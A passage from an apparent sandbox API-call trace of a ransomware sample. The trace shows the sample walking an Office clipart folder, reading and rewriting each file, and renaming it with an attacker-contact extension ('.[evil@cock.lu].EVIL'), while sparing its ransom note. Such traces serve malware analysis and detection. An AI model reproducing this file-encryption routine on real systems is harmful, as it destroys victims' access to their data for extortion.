_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.047] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 69 [0152.047] wcscmp (_String1="J0215076.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.047] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215076.WMF") returned 0x0 [0152.047] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 0x45 [0152.047] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.050] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f50, lpOverlapped=0x0) returned 1 [0152.052] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.053] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.053] _errno () returned 0x84b1160840 [0152.053] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.053] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f60, lpOverlapped=0x0) returned 1 [0152.053] CloseHandle (hObject=0x1a8) returned 1 [0152.053] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.053] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.053] __uncaught_exception () returned 0x84b1160800 [0152.053] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.054] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf.[evil@cock.lu].evil")) returned 1 [0152.055] ??_V@YAXPEAX@Z () returned 0x1 [0152.058] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF", dwFileAttributes=0x200) returned 0 [0152.058] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.058] wcsstr (_Str="J0215210.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.058] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 69 [0152.058] wcscmp (_String1="J0215210.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.059] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215210.WMF") returned 0x0 [0152.059] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 0x45 [0152.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.061] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x81ce, lpOverlapped=0x0) returned 1 [0152.071] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.071] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.071] _errno () returned 0x84b1160840 [0152.071] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x81e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x81e0, lpOverlapped=0x0) returned 1 [0152.072] CloseHandle (hObject=0x1a8) returned 1 [0152.072] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.072] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.072] __uncaught_exception () returned 0x84b1160800 [0152.072] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf.[evil@cock.lu].evil")) returned 1 [0152.074] ??_V@YAXPEAX@Z () returned 0x1 [0152.077] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF", dwFileAttributes=0x200) returned 0 [0152.077] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.077] wcsstr (_Str="J0215709.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 69 [0152.077] wcscmp (_String1="J0215709.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215709.WMF") returned 0x0 [0152.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 0x45 [0152.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.080] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x244a, lpOverlapped=0x0) returned 1 [0152.083] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.083] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.083] _errno () returned 0x84b1160840 [0152.083] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.083] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2460, lpOverlapped=0x0) returned 1 [0152.083] CloseHandle (hObject=0x1a8) returned 1 [0152.084] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.084] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.084] __uncaught_exception () returned 0x84b1160800 [0152.084] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.084] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf.[evil@cock.lu].evil")) returned 1 [0152.085] ??_V@YAXPEAX@Z () returned 0x1 [0152.089] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF", dwFileAttributes=0x200) returned 0 [0152.089] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.089] wcsstr (_Str="J0215710.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.089] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 69 [0152.089] wcscmp (_String1="J0215710.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.089] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215710.WMF") returned 0x0 [0152.089] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 0x45 [0152.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.091] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45a2, lpOverlapped=0x0) returned 1 [0152.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.095] _errno () returned 0x84b1160840 [0152.095] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.095] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45c0, lpOverlapped=0x0) returned 1 [0152.095] CloseHandle (hObject=0x1a8) returned 1 [0152.095] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.095] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.096] __uncaught_exception () returned 0x84b1160800 [0152.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf.[evil@cock.lu].evil")) returned 1 [0152.097] ??_V@YAXPEAX@Z () returned 0x1 [0152.100] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF", dwFileAttributes=0x200) returned 0 [0152.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.101] wcsstr (_Str="J0215718.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.101] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 69 [0152.101] wcscmp (_String1="J0215718.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.101] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215718.WMF") returned 0x0 [0152.101] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 0x45 [0152.101] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.102] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15f2, lpOverlapped=0x0) returned 1 [0152.105] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.105] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.105] _errno () returned 0x84b1160840 [0152.106] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.106] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1600, lpOverlapped=0x0) returned 1 [0152.106] CloseHandle (hObject=0x1a8) returned 1 [0152.106] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.106] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.106] __uncaught_exception () returned 0x84b1160800 [0152.106] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.107] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf.[evil@cock.lu].evil")) returned 1 [0152.108] ??_V@YAXPEAX@Z () returned 0x1 [0152.111] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF", dwFileAttributes=0x200) returned 0 [0152.111] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.111] wcsstr (_Str="J0216112.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.111] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 69 [0152.111] wcscmp (_String1="J0216112.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.111] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216112.JPG") returned 0x0 [0152.111] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 0x45 [0152.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.114] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa783, lpOverlapped=0x0) returned 1 [0152.117] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.117] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.117] _errno () returned 0x84b1160840 [0152.117] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.117] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa7a0, lpOverlapped=0x0) returned 1 [0152.117] CloseHandle (hObject=0x1a8) returned 1 [0152.118] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.118] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.118] __uncaught_exception () returned 0x84b1160800 [0152.118] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.118] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg.[evil@cock.lu].evil")) returned 1 [0152.119] ??_V@YAXPEAX@Z () returned 0x1 [0152.123] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG", dwFileAttributes=0x200) returned 0 [0152.123] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.123] wcsstr (_Str="J0216153.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.123] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 69 [0152.123] wcscmp (_String1="J0216153.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216153.JPG") returned 0x0 [0152.123] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 0x45 [0152.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.132] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5474, lpOverlapped=0x0) returned 1 [0152.138] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.138] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.138] _errno () returned 0x84b1160840 [0152.138] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.138] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5480, lpOverlapped=0x0) returned 1 [0152.138] CloseHandle (hObject=0x1a8) returned 1 [0152.138] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.139] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.139] __uncaught_exception () returned 0x84b1160800 [0152.139] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.139] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg.[evil@cock.lu].evil")) returned 1 [0152.140] ??_V@YAXPEAX@Z () returned 0x1 [0152.144] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG", dwFileAttributes=0x200) returned 0 [0152.144] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.144] wcsstr (_Str="J0216540.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.144] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 69 [0152.144] wcscmp (_String1="J0216540.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.144] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216540.WMF") returned 0x0 [0152.144] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 0x45 [0152.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.147] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa488, lpOverlapped=0x0) returned 1 [0152.150] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.150] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.151] _errno () returned 0x84b1160840 [0152.151] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.151] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xa4a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa4a0, lpOverlapped=0x0) returned 1 [0152.151] CloseHandle (hObject=0x1a8) returned 1 [0152.151] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.151] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.151] __uncaught_exception () returned 0x84b1160800 [0152.151] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.152] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf.[evil@cock.lu].evil")) returned 1 [0152.153] ??_V@YAXPEAX@Z () returned 0x1 [0152.155] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF", dwFileAttributes=0x200) returned 0 [0152.156] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.156] wcsstr (_Str="J0216570.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.156] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 69 [0152.156] wcscmp (_String1="J0216570.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.156] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216570.WMF") returned 0x0 [0152.156] wcslen (_String="C:\\\\Program Files\\Microsoft 